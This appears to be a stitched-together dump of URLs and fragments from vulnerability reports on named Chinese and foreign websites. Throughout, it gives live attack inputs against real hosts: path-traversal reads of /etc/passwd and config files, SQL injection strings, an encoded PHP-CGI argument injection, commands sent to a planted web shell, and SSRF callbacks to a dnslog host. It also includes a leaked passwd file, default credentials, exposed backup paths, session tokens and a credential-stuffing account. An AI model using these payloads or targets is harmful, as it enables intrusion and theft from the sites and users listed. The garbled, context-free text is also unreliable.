http://**.**.**/r/cms/www/22.html_ http://admin.gm.ledu.com/admin https://60.173.222.35/才知道哦 http://60.173.222.34:8000/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction http://60.173.222.34:8000/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://60.173.222.34:8000/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false¶m_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute data:TreeSelectedID=&TableSelectedID=&refSearchProp=unit_code&refSearchPropLbl=%E5%8D%95%E4%BD%8D%E7%BC%96%E7%A0%81&refSearchOper=%3D&refSearchOperLbl=%E7%AD%89%E4%BA%8E&refSearchValue= http://60.173.222.34:8000/NCFindWeb?service=IPreAlertConfigService&filename=../../../../etc/passwd http://60.173.222.34:8000/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml http://60.173.222.34:8000/NCFindWeb?service=IPreAlertConfigService&filename=../../conf/server.xml http://60.173.222.34:8000/NCFindWeb?service=IPreAlertConfigService&filename=../../root.sh http://www.huizhongcf.com/about/yunyingshujutext.html?categoryid=53&id=438 site:c1.cevone.cn http://183.232.64.203/?r=login/index http://183.232.64.203/.svn/entries http://113.106.86.133:8090/admin/login.action http://my.51job.com/cv/CResume/CV_PResume.php?ReSumeID=343783840 https://yun.netentsec.com/main/index/pwfind?action=pwfind¶ms=eyJ1c2VyaWQiOiIxOSIsInVzZXJuYW1lIjoibmV0ZW50c2VjIiwibWFpbCI6ImhhemFyZDA4QDEyNi5jb20iLCJocmVmIjoiaHR0cDpcL1wvbWFpbC4xMjYuY29tIn0=# http://**.**.**.**/delay_loader.php?d=d&file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://**.**.**.**/ http://**.**.**.**/help.jspx URL:http://xueyuan.weibo.com/course/index?key_word=1 http://xueyuan.weibo.com/course/index?key_word=1%'and'%'= http://xueyuan.weibo.com/course/index?key_word=1%'and'%'='1 http://xueyuan.weibo.com/course/index?key_word=$_GET[key_word http://dictfeedback.corp.youdao.com http://dict.youdao.com/feedback/open/feedback/add http://113.106.86.134/ http://113.106.86.134/pma/ http://113.106.86.134/233.php http://**.**.**.**/adminUser/loginAction http://**.**.**.**/ http://try.fashion.sina.com.cn/home/api/?callback=jQuery18201201861931476742_1459425891527&s=front&a=get_beauty_branch&order=time&page=1&size=1&branch=34&_=1459425891539 https://**.**.**.**/ https://**.**.**.**:9090/ http://**.**.**.**//index.aspx?JiGouBianHao=430100 http://**.**.**.**/Modules/XingZhengXuKe/XuKeShenQing.aspx?JiGouBianHao=430000 http://**.**.**.**/Modules/XingZhengXuKe/XuKe_List.aspx?JiGouBianHao=430000 http://**.**.**.**/modules/xingzhengxuke/xuke_list1.aspx?jigoubianhao=430000&list_id=4791 http://www.ponhu.cn/index.php/Adminph/Yijian/index http://www.ponhu.cn/index.php/Adminph/Yijian/index http://nic.ccut.edu.cn/nic.sql http://www.bxd365.com/mopinion/index?page=5 http://www.bxd365.com/vadmin/index http://www.mysongktv.com http://www.mysongktv.com/zhongchou_bookyz.php http://www.mysongktv.com/wz_admin/left.php# http://www.mysongktv.com/wz_admin/article_edit.php?cid=3&id=43 http://wooyun.org/bugs/wooyun-2010-0137397 http://blog.travel.e-picclife.com/Upload/Temp/20160405/201604051641109840935.aspx http://wooyun.org/bugs/wooyun-2015-0146836 xf.house.163.com/sz/qa/goodOrNo/0QWZ.html jdbc:oracle:thin:@**.**.**.**:1521/bjess http://psapp.wine9.com/index.php/User/login/ce16f73b5c31c37760f811d6c6f80b39 http://psapp.wine9.com/index.php/BBS/GetReplyList/ce16f73b5c31c37760f811d6c6f80b39?id=2874&index=1&pagesize=10 http://psapp.wine9.com/index.php/User/getUserInfo/ce16f73b5c31c37760f811d6c6f80b39?session_id=0c64a3fad5aef75202bb2a7175035634&sign=bea76696f05aeff6d42c8aa951010b09&uid=647836 http://psapp.wine9.com/index.php/User/GetAddressList/ce16f73b5c31c37760f811d6c6f80b39?index=1&pagesize=10&sign=bea76696f05aeff6d42c8aa982d1410e&uid=2262620 http://psapp.wine9.com/index.php/User/GetAddressList/ce16f73b5c31c37760f811d6c6f80b39?index=1&pagesize=10&sign=bea76696f05aeff6d42c8aa982d1410e&uid=1550325 http://psapp.wine9.com/index.php/User/GetAddressList/ce16f73b5c31c37760f811d6c6f80b39?index=1&pagesize=10&sign=bea76696f05aeff6d42c8aa982d1410e&uid=2227655 http://api.yiyizuche.cn/ http://cloud.yiyizuche.cn/ https://win.foundersc.com/ http://172.16.27.188/ks-main/web/login http://192.168.132.35/ks-main/web/login http://scwx.e-chinalife.com/staff/prepare_query_staff.action http://scwx.e-chinalife.com http://115.182.85.143:8081/back/frame/getFrame.do http://115.182.85.143:8081/ http://m.youdao.com/softupdate?keyfrom=mdict.6.2.1.iphonepro&imei=11111111111111111111111111111111&model=iPhone8,1&deviceid=11111111111111111111111111111111&mid=9.3.1&username=%28null%29&vendor=AppStore&userid=&idfa=564443CC-9189-42C1-9CC9-0922116AD5C4&abtest=3&ssid=123123 http://www.jingchang.tv/index.php?s=/Home/Index/new_show/id/21 http://182.92.192.87:8090/Default.aspx index.aspx/personfindname http://hotelbid.wandahotels.com/万达酒店建设有限公司招标管理系统 http://www.cheyipai.com http://dacp.asiainfo.com/forgetPwd.html http://ca.10jqka.com.cn/ http://ca.10jqka.com.cn/ca/index/login http://**.**.**.**/ http://notefeedback.corp.youdao.com http://note.elibom.youdao.com/soft-manager/feedback http://note.elibom.youdao.com/soft-manager/feedback?backurl=manual&amp;amp;action=login&amp;backURL=http://note.elibom.youdao.com/noteproxy/login?todo=LoginWapNote&backurl=manual&amp;soft=note&soft=note&mtype=&mid=&imei=&isSubmited=true http://**.**.**.**/bugs/wooyun-2015-0163363 http://www.dns0755.net/ns.php?sid=29 http://www.shenghui56.com/ www.shenghui56.com http://www.shenghui56.com http://service.homelink.com.cn/wct/userfiles/agent/pressImages/201604132837image.jsp?pwd=023&i=whoami http://service.homelink.com.cn/wct/userfiles/agent/pressImages/201604132837image.jsp?pwd=023&i=arp imap://MailServer:Port/fetch imap://**.**.**.**:993/fetch%3EUID%3E/INBOX%3E1 mailbox:///C:/Users/用户名/AppData/Roaming/软件名/随即字符串/Mail/**.**.**.**/Inbox?number=ID imap://**.**.**.**:993/fetch http://school.activetech.com.cn http://**.**.**.** http://**.**.**.**/Conf/jsp/main/mainAction.do http://ha.picchealth.com/index.aspx http://ha.picchealth.com/PwdSave.aspx admin:123456 http://**.**.**/ http://htleasing.cn/About.aspx?CateId=2 http://**.**.**/bea_wls_internal/test.jsp jdbc:oracle:thin:@10.10.136.238:1521:ORCL www.caifupad.com http://en.satrip.com/AboutUs/Contact.asp?Flag=3 http://**.**.**/paybank/_ https://**.**.**/_ http://**.**.**/paybank/jump.jsp_ https://**.**.**/list.html_ http://**.**.**/paybank/14n.jsp http://**.**.**.**/bugs/wooyun-2015-0137474 http://221.176.142.10:8010 http://59.46.9.16/的百度云备案系统 http://update.appstore.vivo.com.cn/port/packages_update/ www.yrhx.com http://sd.91huayi.com http://**.**.**/loginfrom=%2f_ e6:4***** e6:4c:bc***** f2:bc***** e6:4b:7c***** e6:4c:b***** f3:2***** http://info.peaksport.com/UpdateLog/UpdateList.aspx?UpdateYearMonth=201307 http://info.peaksport.com/UpdateLog/UpdateList.aspx?ModuleID=1 http://info.peaksport.com/UpdateLog/UpdateList.aspx?LogID=174 http://rdm.iflytek.com:2000/upload?dir=cmVwb3NpdG9yeQ==&name=bXl0ZXN0LmpzcA==&start=0&size=7000 http://**.**.**.**/upload?dir=cmVwb3NpdG9yeQ==&name=bXl0ZXN0LmpzcA==&start=0&size=7000&"& http://221.4.136.214/ http://221.4.136.214/backup.zip http://218.5.173.228:90/CmxDownload.php http://218.5.173.228:90/Client/CmxAbout.php http://*******/bugs/wooyun-2010-0130866 http://www.genlot.com:3000/upload?dir=cmVwb3NpdG9yeQ==&name=bXl0ZXN0LmpzcA==&start=0&size=7000 http://www.emaotai.cn/wapshop/ProductList.aspx?categoryId=77&keyWord= https://win.foundersc.com/prx/000/http/localhost/welcome/index.html http://**.**.**.**/bugs/wooyun-2016-0190513这个漏洞继续查找中国移动其他身份相似系统,找到个宁夏移动的,虽然没有弱口令,但其另外一个系统存在SQL注入,且两个系统挂在同一个数据库服务器上 http://58.215.43.162/osoa/views/index.html?r=0.9203477809205651 http://58.215.43.162//%20../web-inf/ http://**.**.**.**:2080/pms-service/broadcast/broadcast_program_list?channelId=22&dateTime=2016-04-04+23%3A51%3A14&portalId=14 http://**.**.**.**:2080/pms-service/broadcast/broadcast_program_list?channelId=22&dateTime=2016-04-04+23:51:14%27%20XOR%28IF%28%285189=5189%29,BENCHMARK%286000000,MD5%280x48705554%29%29,5189%29%29%20AND%20%27FImz%27=%27FImz&portalId=14 http://**.**.**.**/bugs/wooyun-2016-0170564 http://**.**.**.**/bugs/wooyun-2016-0170564 com:8888 http://**.**.**.**:443/Conf/jsp/main/mainAction.do http://**.**.**.**/bugs/wooyun-2010-0143276 http://**.**.**.**:443/wooyun.jsp www.sudiyi.cn http://**.**.**/loginfrom=%2f_ ws.cdn.baidupcs.com/file/c8403d299a2db4104879372be2ca130bbkt=p2-nb-196&xcode=f3dad2a2733c26fac7d56582f6e916de903efae2841e1696f77424e07ee197d9&fid=3305421553-250528-737258585075065&time=1449799931&sign=FDTAXGERLBH-DCb740ccc5511e5e8fedcff06b081203-B%2BOuxFVHurP5q8k1HAxDua1ffpg%3D&to=lc&fm=Nin,B,M,ny&sta_dx=210&sta_cs=16&sta_ft=zip&sta_ct=6&fm2=Ningbo,B,M,ny&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=1400c8403d299a2db4104879372be2ca130bfdd91aab00000d184675&sl=79495247&expires=8h&rt=sh&r=876939559&mlogid=7988191254902820211&vuk=3473100178&vbdid=2766612220&fin=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&fn=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&slt=pm&uta=0&rtype=1&iv=0&isw=0&dp-logid=7988191254902820211&dp-callid=0.1.1&wshc_tag=0&wsts_tag=566a30fd&wsid_tag=8ba202ac&wsiphost=ipdbm& ws.cdn.baidupcs.com/file/c8403d299a2db4104879372be2ca130bbkt=p2-nb-196&xcode=f3dad2a2733c26fac7d56582f6e916de903efae2841e1696f77424e07ee197d9&fid=3305421553-250528-737258585075065&time=1449799931&sign=FDTAXGERLBH-DCb740ccc5511e5e8fedcff06b081203-B%2BOuxFVHurP5q8k1HAxDua1ffpg%3D&to=lc&fm=Nin,B,M,ny&sta_dx=210&sta_cs=16&sta_ft=zip&sta_ct=6&fm2=Ningbo,B,M,ny&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=1400c8403d299a2db4104879372be2ca130bfdd91aab00000d184675&sl=79495247&expires=8h&rt=sh&r=876939559&mlogid=7988191254902820211&vuk=3473100178&vbdid=2766612220&fin=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&fn=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&slt=pm&uta=0&rtype=1&iv=0&isw=0&dp-logid=7988191254902820211&dp-callid=0.1.1&wshc_tag=0&wsts_tag=566a30fd&wsid_tag=8ba202ac&wsiphost=ipdbm& root:/roo***** sbin:/usr/***** nc:/bin:/***** games:/usr/***** man:/usr/***** lpd:/usr/***** mail:/usr/s***** news:/us***** uucp:/***** bin:/usr***** www:/us***** backups:/us***** ager:/var/list:***** ircd:/usr***** http://180.97.33.195/pcheck/index.php?action=showPcheck&report=../../../../../../../../../../etc/passwd http://180.97.36.23/pcheck/index.php?action=showPcheck&report=../../../../../../../../../../etc/passwd http://180.97.33.195/pcheck/index.php?action=showPcheck&report=../../../../../../../../../../home/img/odp/log/access_log http://180.97.33.195/pcheck/index.php?action=showPcheck&report=../../../../../../../../../../home/img/odp/webroot/pcheck/index.php http://180.97.33.195/pcheck/index.php?action=../../../../../../../../../../home/img/odp/log/access_log%00&report=1 http://123.59.58.72/ http://txd.tangdou.com http://123.59.58.72 http://www.lvmama.com/trip/show/ajaxGetCommon http://202.108.12.127/ http://sms.sf-express.com http://sms.sf-express.com/loginmgmt/login.action http://etc.ccut.edu.cn/type.asp?id=1391 http://etc.ccut.edu.cn/type.asp?id=1391 http://**.**.**.**//Service/ComService.svc http://**.**.**.**/jsp/society/societyOwner.jsp http://202.108.12.230/ http://60.255.50.1:8080/seeyon/ http://60.255.50.1:8080/seeyon//logs/login.log http://**.**.**.**:8080/admin/login http://**.**.**.**:8080/pro/login svn://**.**.**.**/ http://**.**.**.**/p2padmin/ http://jira.**.**.**.**/ http://pan.gyey.com/ http://116.228.243.162:9000/pdm/Login http://219.239.205.152/ http://qiaodan.com/e/cpdh.php?classid=1 http://www.qiaodan.com/VIP/php.php http://www.qiaodan.com/VIP/sea.php https://github.com/summerrc/bilibili http://wybjpkc.henu.edu.cn/regform.php?membertypeid=12%20where%201 URL:http://**.**.**.** http://**.**.**.**:7001/ http://**.**.**.**/bugs/wooyun-2016-0173342 http://dzswsw.yxk.ccut.edu.cn/pic.asp?w=1&s_hh=200&id=468 http://**.**.**.**/bugs/wooyun-2016-0173342 http://**.**.**.**:82/fire/login.action http://**.**.**.**:84/notesys/superlogin.jsp http://**.**.**.**/bugs/wooyun-2015-0136031 https://**.**.**.**/cqvZn5BQMk5q2 https://**.**.**.**/cqvZGXZPhKpNr http://lady.mop.com/admin/ http://health.mop.com/admin/ http://society.mop.com/admin/ http://**.**.**/RSC/_ http://**.**.**/RSC/qq.jsp http://chexian.sinosig.com/Net/netCarInfoControl!returnFirstStep.action?paraMap.id=320000 http://61.135.131.153/ http://**.**.**.**/link?url=voTDWhx82NQaCYRe9JGAbzuPxDjetIru7aYlyyl7EFpVEOofDyRykcDYdPQNGmitPvCrco9_mcFQhheNDu4YYsKP7e01YDsCx4MBLzPX6CK http://**.**.**/RSC/ http://**.**.**/RAS/test.jsp http://**.**.**/RAS/_ http://app.art.ifeng.com/?app=system&controller=fall&tag=%25E6%25A3%25AE%25E6%259E%2597*&action=tagspage&jsoncallback=jsonp1460102650253&page=2&_=1460102652833&size=50 http://api.ffan.com/ffan/v1/appskin/appSkins?FFClientType=1&FFClientVersion=32100000&FFUDID=15440&ddId=55&pLoginToken=bc5a89c493de&puid=7A3A3&size=750_1334&version=1&wdId=0f1cf59b3ff http://182.151.210.184:8888 https://mail.jinlianchu.com/extmail/cgi/env.cgi http://info.ca.315i.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost:80&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://info.coalchem.315i.com/uddiexplorer/SearchPublicRegistries.jsp?operator= http://gas.315i.com/common/goArticleList?productIds=002003%2C002&type=0&columnIds=007002 http://oil.315i.com/common/goArticleList?productIds2=001015&productIds=001010&type=1&columnIds=001021&productId=001015 http://202.131.75.66/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E http://eqxiu.com/home/login,输入用户名和密码发现两三次错误后就会提示要拖动进行验证,正确进行拖动,然后点击登陆,此时抓包,可以看到只要geetest_validate与geetest_seccode参数处保持一致就能够绕过验证,进行撞库。这里撞库获得1300多个账号,进一步发现登陆后输入http://eqxiu.com/usercenter/member,抓包有一个http://eqxiu.com/m/u/info的包会返回账号秀点值,秀点可是要拿钱买的,用撞库获得的账号,获取JSESSIONID,替换http://eqxiu.com/m/u/info包中的JSESSIONID,从而可知各用户的秀点值。 http://bbs.cheshi.com/space.php?uid=1007445 http://appapi.yc.ifeng.com/web/store.php?a=announcement&token=8e7bab8d33&ct=iOS&pos=1* http://appapi.yc.ifeng.com/web/qy_comments.php?a=shuping_index&articleid=1 http://appapi.yc.ifeng.com/web/store.php?a=announcement&token=8e7bab8d33&ct=iOS&pos=1* http://www.saclub.com.cn/ www.saclub.com.cn http://m.yiihuu.com/zyxz/?q=1 http://m.sjzhushou.com/cgi-bin/homepage?imeiID=863890026674804&partnerID=1&peerID=986CF557EB73004V&productID=37&type=ad&version=5.15.2.3820&versionCode=10560 http://m.sjzhushou.com/cgi-bin/homepage?imeiID=863890026674804&partnerID=1%27%20or%201=1%20--%20-&peerID=986CF557EB73004V&productID=37&type=ad&version=5.15.2.3820&versionCode=10560 http://m.sjzhushou.com/cgi-bin/homepage?imeiID=863890026674804&partnerID=1 http://www.h3c.com.cn/pub/2015_Event/H3CB_2015/bottom_9.html http://hz.meilishuo.com/css/get.php?url=svn.meilishuo.com intent://#Intent;S.extraction=goto_page;S.jump_config={"jump":{"type":4,"url":"**.**.**.**/baidudemo.html?ju=1","title":"title","fParam":"","filter_type":1}};SEL;component=com.baidu.appsearch/com.baidu.appsearch.EmptyActivity;end http://**.**.**.**:8001 http://www.whu-sh.org/news_data.php?cid=1 encap:Ethernet fe8c:655d/64 Scope:Link MTU:1500 packets:208811177 packets:166174545 txqueuelen:1000 http://ebk.17u.cn/zizhuyou/ http://csmsg.focus.cn/group/vinvite.php http://218.17.224.215:8082/ http://218.17.224.215:8082/obj/Debug/SFWCFService.dll http://scan.cninsure.net/filemanager/login.do http://www.xiabu.com/?c=forgot http://**.**.**.**:8014/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml http://**.**.**.**:8014/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml http://**.**.**.**:8000/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml https://myerp.public.apsva.us/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml http://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml http://**.**.**.**:8000/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml https://**.**.**.**.kw/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml http://203.195.162.226:8080/ http://203.195.162.226:8080/logRecord/show/5105339 http://www.cninsure.net/News/NewsInfo.aspx?ID=8162 http://203.195.162.226:8080/logRecord/list http://203.195.162.226:8080/logRecord/show/5105339 http://203.195.162.226:8080/logRecord/show/5105340 http://203.195.162.226:8080/logRecord/show/5105341 http://space.bilibili.com/ajax/member/getCoinVideos?mid=9616637&pagesize=100 http://**.**.**.**:8014//OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId={TARGET http://**.**.**.**:8014//OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb http://66ae2b.dnslog.info/aabb http://**.**.**.**:8014//OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb https://**.**.**.**/OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb https://**.**.**.**/OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb https://**.**.**.**.au/OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb https://ofweb.**.**.**.**:8051/OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb https://**.**.**.**:4453/OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb http://dia.58.com/phpmyadmin/ http://www.bj-cnpl.com http://www.bj-cnpl.com/showstate.asp?orderno=CI065580410JP*&x=38&y=1 http://m.focus.cn/zhongchou/gz/261/yaohao/?mobile=1* http://s1.api.tv.itc.cn/v6/mobile/channel/list.json?sysver=7.1.1&sver=1*&plat=3&channel_list_type=3&build=5.5.0.2&partner=1&api_key=695fe827ffeb7d74260a813025970bd5&poid=1 https://contact.mercedes-benz.com.cn/brochure/step2/?model=35&fromoutside=s65l-amg-emb&language=cn http://www.lvgou.com/incubator?city=-1 jdbc:oracle:thin:@**.**.**.**:1521:orcl http://channelsys.netentsec.com/ http://yjsy.dept.ccut.edu.cn/article.asp?5x3g1t3W2B183.html http://yjsy.dept.ccut.edu.cn/sort.asp?3d2y35283z2f1.html http://**.**.**.**:8443/index.php?a=dataversion&c=app&m=api https://nosec.org/my/threats/874 http://ecadmin.ddexp.com.cn/ http://i.lvgou.com/.svn/entries http://new.lvgou.com/lvgou.zip http://weixin.lvgou.com/lvgou.zip http://shouji.sogou.com/sapp/media/pc.html?site=20150212website http://quanjing.baidu.com/panoShare/versions/v1/fetchImage.php?id=http://family.baidu.com/ http://d.fm.ifeng.com/fm/read/fmd/public/reportResourceUserScore_640.html http://**.**.**.**ipr.jp/login.action http://club.kingdee.com/uc_server/admin.php https://mail.fortinet.com.cn http://www.hr.com.cn/ www.hr.com.cn https://oa.minshengec.cn/seeyon//logs/login.log http://mail.scal.com.cn/names.nsf?Login http://www.zonglai.com/client_detail.html?client_id=1114 http://www.cyw.dept.ccut.edu.cn/pic.asp?id=465 http://kyc.dept.ccut.edu.cn/pic.asp?id=445 http://jxjy.dept.ccut.edu.cn/pic.asp?id=246 http://3y3s.zt.ccut.edu.cn/pic.asp?id=451 http://jdgc.dept.ccut.edu.cn/pic.asp?id=919 http://gfzwl.jpk.ccut.edu.cn/pic.asp?id=490 http://dzswsw.yxk.ccut.edu.cn/pic.asp?id=468 http://ywhcfy.yxk.ccut.edu.cn/pic.asp?id=505 http://hxsm.dept.ccut.edu.cn/pic.asp?id=52 http://dqxy.dept.ccut.edu.cn/pic.asp?id=445 http://xsc.dept.ccut.edu.cn/pic.asp?id=467 http://tyjy.dept.ccut.edu.cn/pic.asp?id=503 http://zcglc.dept.ccut.edu.cn/pic.asp?id=454 http://hqc.dept.ccut.edu.cn/pic.asp?id=487 http://wmw.dept.ccut.edu.cn/pic.asp?id=493 http://xjb.dept.ccut.edu.cn/pic.asp?id=483 http://fzgh.dept.ccut.edu.cn/pic.asp?id=478 http://kycsk.dept.ccut.edu.cn/pic.asp?id=246 http://aims.dept.ccut.edu.cn/pic.asp?id=464 http://xlzx.zt.ccut.edu.cn/pic.asp?id=492 http://gh.dept.ccut.edu.cn/pic.asp?id=479 http://mba.dept.ccut.edu.cn/pic.asp?id=454 http://app.3see.com/job/public/post.php?pid=2960 http://dag.dept.ccut.edu.cn/ http://221.226.125.220:8001/iphone/ encap:Ethernet D8:D3:85:A7:39:44 addr:172.18.10.103 Bcast:172.18.255.255 Mask:255.255.0.0 dad3:85ff:fea7:3944/64 Scope:Link MTU:1500 packets:1168284754 packets:470174835 txqueuelen:1000 http://3g.163.com/ntes/special/00340QR4/app.html#download http://[IP]/config/user_toLoginPage.action http://【IP】/admin/user_updatePassword.action?nowTime=【时间戳】 http://store.dji.com/cn/product/phantom-4 https://store.dji.com/cn/buy/checkout?t=bn&i=4231&q=1&bind_care_id=0 https://store.dji.com/cn/transactions/32457360e54d332213645731228b456c jdbc:oracle:thin:@**.**.**.**:1521:ebank http://www.chinese-js.com/NewsDetail.aspx?id=105192 http://**.**.**.**/ https://103.245.128.110:8880/ http://218.242.60.194:8080/PDBSReports/login.aspx http://218.242.60.194:8080 http://114.141.178.135/index.php http://114.141.178.135/include/cacti.2015-01-22.sql http://114.141.178.135:8080/webloader http://114.141.178.105:8080/webloader https://54.223.244.5:47583/frame.htm http://base.263zztx.com/ http://boss-ims.263zztx.com/ http://ots.hp-telecom.com/ http://hpt.3g.hp-telecom.com/ http://114.141.178.105/inbox http://base.263zztx.com//uploads/attachments/224cd1e7bd02097aa1a55549458f3ed4.pdf http://114.141.185.54:9090/263Server/ http://122.112.15.197 http://122.112.15.197/admin/user/inituserinfo.p http://122.1 https://github.com/swrazg/Data_watch/blob/8928be298f723445954fb93ab1e3a2478f65ca3d/send_mail.py http://114.255.197.64:9090/ http://114.255.197.64:9090/1.asp Site:http://crm.airkunming.com/ http://eln.coolpad.com Mosuan-3:tangscan http://eln.coolpad.com http://eln.coolpad.com http://eln.coolpad.com root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin checkuser:x:500:500::/home/checkuser:/bin/bash tomcat:x:501:501::/home/tomcat:/bin/bash virtual:x:502:502::/home/virtual:/bin/false nagios:x:503:503::/usr/local/nagios:/bin/bash elearning:x:504:504::/home/elearning:/bin/bash http://wooyun.org/bugs/wooyun-2015-0106070 http://**.**.**.**/console/loginExit/loginExit_DG3!login.action https://github.com/arjrWangwei/Underground/blob/7b8e8f3f2ea9dd9520d9e367416a49778e227d29/EmailService/src/test/java/com/creditcloud/email/EmailTest.java https://github.com/miuraSky/gouda-php-jmirrors/blob/414eba4ad26c6ae952af237367bf3ff076e4fb31/build.gradle https://gitlab.creditcloud.com/public jdbc:oracle:thin:@**.**.**.**:1521:watf http://61.135.151.193/login.aspx http://my.tv.sohu.com/user/setting/basic.do http://180.76.153.23 http://180.76.153.23:81/ http://mall.wan.2345.com/task/taskList?gid=1021&own=0&page=1 http://wechat.datangmobile.cn http://wechat.datangmobile.cn/axis2/ 